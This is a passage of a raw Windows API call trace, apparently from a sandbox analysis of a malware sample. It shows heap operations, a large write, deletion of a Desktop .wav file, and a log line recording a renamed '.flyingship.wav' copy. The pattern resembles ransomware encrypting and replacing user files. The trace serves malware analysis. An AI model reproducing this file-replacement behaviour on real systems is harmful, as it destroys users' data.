returned 1 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.744] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0075.744] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.744] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.744] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.745] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.745] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.745] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.745] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.745] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.745] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.745] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.746] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.746] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.747] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.747] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.747] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.747] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.747] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.747] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.747] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.747] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.747] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.747] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.747] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.747] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.747] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.747] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.747] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.747] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.747] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.747] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.747] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.747] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.747] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.747] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.748] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.748] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.748] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa) returned 0x76e378 [0075.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x76e378, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0075.748] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.748] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0075.748] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.748] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.748] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0075.748] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.748] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.748] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.748] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.748] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.748] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.748] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.748] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.748] WriteFile (in: hFile=0x140, lpBuffer=0x771fe8*, nNumberOfBytesToWrite=0x12245, lpNumberOfBytesWritten=0x61e598, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesWritten=0x61e598*=0x12245, lpOverlapped=0x0) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.749] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.750] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.751] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.751] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.751] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.751] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.751] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.751] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0075.751] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.751] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.751] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.754] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.754] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.754] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.754] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.754] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav", lpFilePart=0x0) returned 0x3b [0075.755] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b818900, ftCreationTime.dwHighDateTime=0x1d5d8b1, ftLastAccessTime.dwLowDateTime=0x575d47f0, ftLastAccessTime.dwHighDateTime=0x1d5e344, ftLastWriteTime.dwLowDateTime=0xc9ecaa20, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x12245, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="1SXWH1rq8k oa-Gv-.wav", cAlternateFileName="1SXWH1~1.WAV")) returned 0x6b89f8 [0075.755] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1sxwh1rq8k oa-gv-.wav")) returned 1 [0075.758] FindNextFileW (in: hFindFile=0x6b89f8, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b818900, ftCreationTime.dwHighDateTime=0x1d5d8b1, ftLastAccessTime.dwLowDateTime=0x575d47f0, ftLastAccessTime.dwHighDateTime=0x1d5e344, ftLastWriteTime.dwLowDateTime=0xc9ecaa20, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x12245, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="1SXWH1rq8k oa-Gv-.wav", cAlternateFileName="1SXWH1~1.WAV")) returned 0 [0075.758] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.758] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.758] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.758] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.758] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.759] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.759] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.759] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.759] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.759] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.759] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.759] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0075.759] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.759] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.759] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.759] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0075.759] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.760] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0075.760] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x250, lpOverlapped=0x0) returned 1 [0075.760] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0075.760] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x250, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.760] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.760] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.760] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0075.760] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.760] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.flyingship.wav\r\n", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0075.760] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x49) returned 0x6d3530 [0075.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.flyingship.wav\r\n", cchWideChar=73, lpMultiByteStr=0x6d3530, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 73 [0075.760] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.760] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3480 [0075.760] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0075.760] WriteFile (in: hFile=0x140, lpBuffer=0x6d3480*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x6d3480*, lpNumberOfBytesWritten=0x61eef4*=0x48, lpOverlapped=0x0) returned 1 [0075.761] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0075.761] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.761] CloseHandle (hObject=0x140) returned 1 [0075.761] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: 